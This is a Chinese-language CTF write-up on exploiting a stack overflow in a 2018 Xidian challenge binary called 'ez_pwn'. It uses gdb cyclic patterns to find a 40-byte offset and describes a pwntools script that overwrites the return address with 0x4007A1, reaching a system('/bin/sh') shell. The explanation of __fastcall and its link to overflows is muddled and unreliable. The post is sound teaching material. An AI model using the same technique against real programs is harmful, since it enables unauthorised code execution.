简单的PWN堆栈溢出的尝试

这是一道2018年西电CTF线下赛的一道ez_pwn的小题目,该题目为堆栈溢出漏洞的利用1

本次实验环境为 ubuntu 20.0.4

使用工具:GDB pwngdb

首先分析文件大致情况

checksec ez_pwn简单的PWN堆栈溢出的尝试_第1张图片
Arch: amd64-64-little 表示该二进制文件是 64 位的 。
RELRO: Partial RELRO 表示通过可重定位只读(RELRO)技术对代码进行了一定程度的保护,但仍存在某些攻击方式可以绕过此保护。
Stack: No canary found 表示堆栈未启用栈保护机制,例如栈破坏保护(Stack Canary)等。
NX: NX disabled 表示二进制文件的内存页没有启用不可执行(NX)标志,允许代码在栈或堆上执行。
PIE: No PIE (0x400000) 表示二进制文件在运行时地址固定,没有启用位置无关性(PIE)标志。
RWX: Has RWX segments 表示二进制文件中存在可读写可执行的内存段,是一个很容易受到攻击的弱点。

使用ida pro打开程序,注意,需要使用64位的ida pro

简单的PWN堆栈溢出的尝试_第2张图片
点击main函数,然后按F5看伪代码就行
简单的PWN堆栈溢出的尝试_第3张图片
代码结构简单,程序运行首先会让你输入一个参数,233跳到sub_400726()函数,666跳到sub_400737()函数,5438跳到sub_400748(5438LL)函数
简单的PWN堆栈溢出的尝试_第4张图片
简单的PWN堆栈溢出的尝试_第5张图片
前两个函数没有什么实际内容,我们直接看最后一个函数
__fastcall是一个函数调用约定,它通过CPU寄存器传递参数。他用EAX和EDX传送前两个双字,剩下的参数从左至右入栈,函数自身清理堆栈,返回值在EAX中(这个是在32位下,64位请自行脑补),简单说一下这个,就是它可以自己清理堆栈,但是又不会释放堆栈,如果堆栈被重复利用的话可能会导致堆栈溢出

简单的PWN堆栈溢出的尝试_第6张图片

这个里面有一个system()函数,但是他是不能直接用的,因为他需要传递参数233的时候才能执行,但是传递只有传递的参数为5438的时候才能进入到sub_400748(int a1)这个函数里面,所以这里就需要利用堆栈溢出的漏洞来做

我们可以看到,在这段代码中存在栈溢出漏洞,因为 read 函数没有限制输入字符串的长度,而 buf 变量只有 0x50(80)个字节大小,如果用户输入的字符串超过了这个长度,就会导致栈溢出,覆盖掉其他重要的数据,但是很奇怪,笔者尝试实际上输入32个字节的内容就会造成溢出的情况

简单的PWN堆栈溢出的尝试_第7张图片
我们知道栈溢出是由于read()函数没有限制用户输入的字符长度引起的,所以我们在做动态调试的时候,需要知道read()函数的位置,好下断点 0x40077D
简单的PWN堆栈溢出的尝试_第8张图片
我们使用gdb对其进行动态调试,这样的话不需要静态分析偏移量
gdb ./ez_pwn

简单的PWN堆栈溢出的尝试_第9张图片
打断点
简单的PWN堆栈溢出的尝试_第10张图片
r 运行至断点处
简单的PWN堆栈溢出的尝试_第11张图片
cyclic 512 生成512个字符串
在这里插入图片描述
ni 执行下一步,将字符串复制粘贴进去
简单的PWN堆栈溢出的尝试_第12张图片
忽略报错
简单的PWN堆栈溢出的尝试_第13张图片
ni执行下一步,而后一直按回车,直到看到rsp寄存器为止(或者一直运行到程序不动)
简单的PWN堆栈溢出的尝试_第14张图片
使用cyclic -l faaaaaaa 查看rsp寄存器偏移量,需要注意的是,cyclic -l 指定的是8个字节,所以需要将rsp寄存器的值取前8位
在这里插入图片描述
此时我们得到,当前rsp寄存器的偏移量为40
下一步就是直接找到system执行函数里面的 /bin/sh的寄存器地址 4007A1
简单的PWN堆栈溢出的尝试_第15张图片
写python脚本如下
简单的PWN堆栈溢出的尝试_第16张图片

 from pwn import *:导入 Pwntools 库。
    p = process('./ez_pwn'):创建新进程并执行 ./ez_pwn 可执行文件。

    p.recv():接收来自程序的输出。
    p.sendline('5438'):向程序发送数据,此处为字符串 '5438',其作用是向程序提供输入。
    p.recv():接收来自程序的输出。
    gdb.attach(p,'b *0x400782\nc'):使用 gdb 调试器附加到进程 p 上,并设置断点(在地址 0x400782 处)和继续运行程序。
    payload = b'A'*40+p64(0x4007A1):构造缓冲区溢出的 payload,其中包括 40 个字节的 'A' 和地址 0x4007A1。
    p.sendline(payload):向程序发送 payload。
    p.interactive():将控制台交互转移到用户,以便用户手动与程序进行交互。


直接运行该脚本,成功栈溢出并执行系统命令
简单的PWN堆栈溢出的尝试_第17张图片

你可能感兴趣的:(ubuntu,pwn,二进制,堆栈溢出)